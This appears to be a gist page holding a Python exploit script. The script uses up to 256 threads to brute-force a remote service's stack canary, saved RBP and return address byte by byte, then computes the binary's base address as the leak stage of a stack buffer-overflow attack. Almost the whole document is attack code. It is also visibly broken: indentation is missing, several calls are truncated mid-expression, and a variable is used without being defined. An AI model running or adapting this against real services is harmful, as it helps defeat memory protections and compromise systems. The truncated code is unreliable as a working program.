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Last active June 5, 2020 20:21
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#!/usr/bin/env python3
from struct import pack,unpack
from threading import Thread
from telnetlib import Telnet
from time import sleep
import socket
import sys
p64 = lambda x: pack("Q",x) # convert to little endian
u64 = lambda x: unpack("Q",x)[0] # revert back from little endian
TRGT = (sys.argv[1], int(sys.argv[2])) # ip and port as arguments
N_THREADS = 256 # number of maximum threads, reduce according to your machine
def Threaded(fn): # annotation wrapper to launch a function as a thread
def wrapper(*args, **kwargs):
t = Thread(target=fn, args=args, kwargs=kwargs)
return t
return wrapper
def default_range(leak): # default range of values
return range(0x100) # '0x00' to '0xff'
class FoundInstance: # class to store flag for finding a particular byte
def __init__(self):
class Bruter: # class to bruteforce addresses
def __init__(self):
self.start = b'' # start bytes of address
self.end = b'' # end bytes of address
self.buf = b'A'*200 # length of buffer
self.msg = "Leaking : \t" # message to print
self.thrds = [] # store the threads
@Threaded # will make it launch as a thread
def find_at(self, val, inst, ln_st):
if not inst.FOUND_IT: # check flag if particular byte was found
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(TRGT) # connect to target
s.recv(1024) # receive input prompt
s.send(self.buf + self.start+bytes([val])) # send payload with next attempted byte val
ret=s.recv(1024) # receive response
s.close() # close socket
if b'Request complete, Closing' in ret: # check if server sent correct response
if not inst.FOUND_IT: # if values isn't found yet, done to check for some race conditions
if len(self.start) == ln_st: # check if it's not changed.
self.start+=bytes([val]) # add the correct byte
inst.FOUND_IT=True # set flag
def iterate_range(self,get_range):
for val in get_range(self.start):
self.thrds.append(self.find_at(val, inst, len(self.start)))
print('\r' + self.msg + '0x' + self.end.hex() + (hex(val)[2:]+self.start[::-1].hex()).rjust(16-2*len(self.end), '0'), end=' ')
while len(self.thrds)>=N_THREADS: # to wait if max threads are reached
sleep(0.2) # wait a bit
for ix,t in enumerate(self.thrds): # enumerate through threads
if not t.is_alive(): # check if thread has finished executing
self.thrds.pop(ix) # remove thread if executed
if inst.FOUND_IT:
return # return from function if found during while loop
if inst.FOUND_IT:
return # return from function if found during for loop
def call(self, get_range=default_range):
len_rem = 8-len(self.end) # calculate no of bytes remaining
while len(self.start)<len_rem: # until all bytes are found
self.iterate_range(get_range) # call function to check all values for particular byte in range
print('\r' + self.msg + '0x' + self.end.hex() + self.start[len_rem::-1].hex().rjust(16-2*len(self.end), '0'), end=' ')
return self.start[:len_rem] + self.end[::-1]# return complete address
brt = Bruter() # initialize bruter
brt.start = b'\x00' # stack canary always has 0x00 a null byte
brt.end = b'' # no pattern for this
brt.buf = b'A'*200 # buffer length, offset to canary
brt.msg = "Leaking CANARY:\t"
CANARY = u64( # call and start bruteforce, save canary to variable
brt = Bruter()
brt.start = b''
brt.end = b'\x00\x00\x7f' # RBP has this constant
brt.buf = b'A'*200
brt.buf += p64(CANARY) # add leaked canary to payload
brt.msg = "Leaking RBP:\t"
def rbp_range(leak):
if len(leak)==4: # 5th byte of RBP changes from 0xfc to 0xff
return range(0xfc,0x100)
return range(0x100)
RBP = u64(
# Offset to return address is 0x1552
brt = Bruter()
brt.start = b'\x52' # return address constant byte at start
brt.end = b'\x00\x00' # constant bytes at end
brt.buf = b'A'*200
brt.buf += p64(CANARY) # add leaked canary
brt.buf += p64(RBP) # add leaked RBP
brt.msg = "Leaking RET:\t"
def ret_range(leak):
if len(leak)==1: # '5 52' is constant. '0x52' is already in start variable
return range(0x5,0x100,0x10) # generates values ending with '5'
if len(leak) == 5:
return range(0x55,0x57) # 6th byte changes from '0x55' to '0x56'
return range(0x100)
RET = u64(
BIN_BASE = RET - 0x1552 # Subtract offset to return address to get base address of bianry
print("[*] Binary base calculated:\t",hex(BIN_BASE))
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